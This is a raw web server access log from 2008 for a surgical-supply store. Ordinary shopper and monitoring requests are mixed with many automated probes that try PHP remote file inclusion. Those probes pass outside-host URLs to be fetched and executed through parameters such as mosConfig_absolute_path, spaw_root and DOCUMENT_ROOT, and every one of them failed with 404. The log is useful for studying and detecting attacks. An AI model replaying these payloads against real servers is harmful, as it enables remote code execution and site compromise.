24.121.100.169 - - [06/Sep/2008:01:38:35 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:35 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:35 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:35 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:35 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:35 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:36 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:36 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:36 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:36 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:36 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:36 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
163.19.117.1 - - [06/Sep/2008:01:39:45 -0400] "GET /logs/access_log.Q108081400///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
163.19.117.1 - - [06/Sep/2008:01:39:47 -0400] "GET ///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
163.19.117.1 - - [06/Sep/2008:01:39:47 -0400] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
208.116.1.202 - - [06/Sep/2008:01:40:21 -0400] "GET /logs/access_log.Q108081400//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:01:40:21 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:01:40:22 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
208.116.1.202 - - [06/Sep/2008:01:40:22 -0400] "GET /logs/access_log.Q108081000//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
209.59.12.99 - - [06/Sep/2008:01:41:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [06/Sep/2008:01:46:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.73.188.36 - - [06/Sep/2008:01:47:48 -0400] "GET /logs/error_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:01:47:48 -0400] "GET //encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:01:47:48 -0400] "GET /logs//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
66.221.210.103 - - [06/Sep/2008:01:47:48 -0400] "GET /logs/error_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:47:49 -0400] "GET //encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:47:49 -0400] "GET /logs//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
193.189.74.23 - - [06/Sep/2008:01:47:54 -0400] "GET /logs/error_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:01:47:55 -0400] "GET //encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:01:47:55 -0400] "GET /logs//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
69.73.188.36 - - [06/Sep/2008:01:48:11 -0400] "GET /logs/access_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
66.221.210.103 - - [06/Sep/2008:01:48:11 -0400] "GET /logs/access_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
193.189.74.23 - - [06/Sep/2008:01:48:17 -0400] "GET /logs/access_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
68.108.181.161 - - [06/Sep/2008:01:49:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:49:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:49:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:49:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
213.150.60.20 - - [06/Sep/2008:01:51:15 -0400] "GET /logs/error_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 253 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:01:51:15 -0400] "GET //encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 227 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:01:51:15 -0400] "GET /logs/error_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 253 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:01:51:15 -0400] "GET /logs//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 232 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:01:51:15 -0400] "GET //encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 227 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:01:51:16 -0400] "GET /logs//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 232 "-" "libwww-perl/5.53"
69.73.188.36 - - [06/Sep/2008:01:51:25 -0400] "GET /logs/access_log.Q108062700//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:01:51:25 -0400] "GET //eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 206 "-" "libwww-perl/5.810"
69.73.188.36 - - [06/Sep/2008:01:51:25 -0400] "GET /logs//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 211 "-" "libwww-perl/5.810"
209.59.12.99 - - [06/Sep/2008:01:51:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.199.190.37 - - [06/Sep/2008:01:51:41 -0400] "GET /logs/error_log.Q108051800//skin/zero_vote/error.php?dir=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
195.199.190.37 - - [06/Sep/2008:01:51:43 -0400] "GET /logs/error_log.Q108082100//skin/zero_vote/error.php?dir=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
69.73.188.36 - - [06/Sep/2008:01:51:48 -0400] "GET /logs/access_log.Q108052800//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
68.108.181.161 - - [06/Sep/2008:01:51:59 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75294 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:00 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:00 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:00 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
64.246.42.3 - - [06/Sep/2008:01:52:01 -0400] "GET /logs/access_log.Q108081200/lostpasswd.php?env[include_prefix]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.64"
68.108.181.161 - - [06/Sep/2008:01:52:01 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
64.246.42.3 - - [06/Sep/2008:01:52:01 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.64"
68.108.181.161 - - [06/Sep/2008:01:52:01 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
64.246.42.3 - - [06/Sep/2008:01:52:01 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.64"
68.108.181.161 - - [06/Sep/2008:01:52:01 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:01 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:01 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:01 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:01 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:01 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:02 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:02 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:02 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:02 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:02 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:02 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:03 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:03 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:03 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:03 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:03 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:03 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:03 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:04 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:04 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:04 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:04 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:04 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:06 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
193.189.74.23 - - [06/Sep/2008:01:52:07 -0400] "GET /logs/access_log.Q108062700//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:01:52:08 -0400] "GET //eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 206 "-" "libwww-perl/5.811"
193.189.74.23 - - [06/Sep/2008:01:52:08 -0400] "GET /logs//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 211 "-" "libwww-perl/5.811"
68.108.181.161 - - [06/Sep/2008:01:52:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L5F52F3250795F8003CD905I+M37+ENG HTTP/1.1" 200 59596 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:20 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52F3250795F8003CD905I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:21 -0400] "GET /images/items/00320103_THUMB.JPG HTTP/1.1" 200 2746 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52F3250795F8003CD905I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:21 -0400] "GET /images/items/00200106_THUMB.JPG HTTP/1.1" 200 1533 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52F3250795F8003CD905I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:21 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52F3250795F8003CD905I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
68.108.181.161 - - [06/Sep/2008:01:52:21 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52F3250795F8003CD905I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
193.189.74.23 - - [06/Sep/2008:01:52:38 -0400] "GET /logs/access_log.Q108052800//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
213.150.60.20 - - [06/Sep/2008:01:53:25 -0400] "GET /logs/access_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 254 "-" "libwww-perl/5.53"
213.150.60.20 - - [06/Sep/2008:01:53:26 -0400] "GET /logs/access_log.Q108070600//encapscms_PATH/core/core.php?root=http://www.piratamix.net63.net/TT?? HTTP/1.0" 404 254 "-" "libwww-perl/5.53"
64.246.42.3 - - [06/Sep/2008:01:53:41 -0400] "GET /logs/access_log.Q108081300/lostpasswd.php?env[include_prefix]=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.64"
151.11.24.250 - - [06/Sep/2008:01:53:57 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:01:53:57 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:01:53:58 -0400] "GET /logs/error_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:01:53:58 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
151.11.24.250 - - [06/Sep/2008:01:54:28 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 221 "-" "Mozilla/4.61 [en] (OS/2; U)"
151.11.24.250 - - [06/Sep/2008:01:54:28 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 216 "-" "Mozilla/4.61 [en] (OS/2; U)"
151.11.24.250 - - [06/Sep/2008:01:54:29 -0400] "GET /logs/error_log.Q108081100%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aquaentellius.com/readme1.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
66.221.210.103 - - [06/Sep/2008:01:55:24 -0400] "GET /logs/access_log.Q108062700//eng.php?img=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
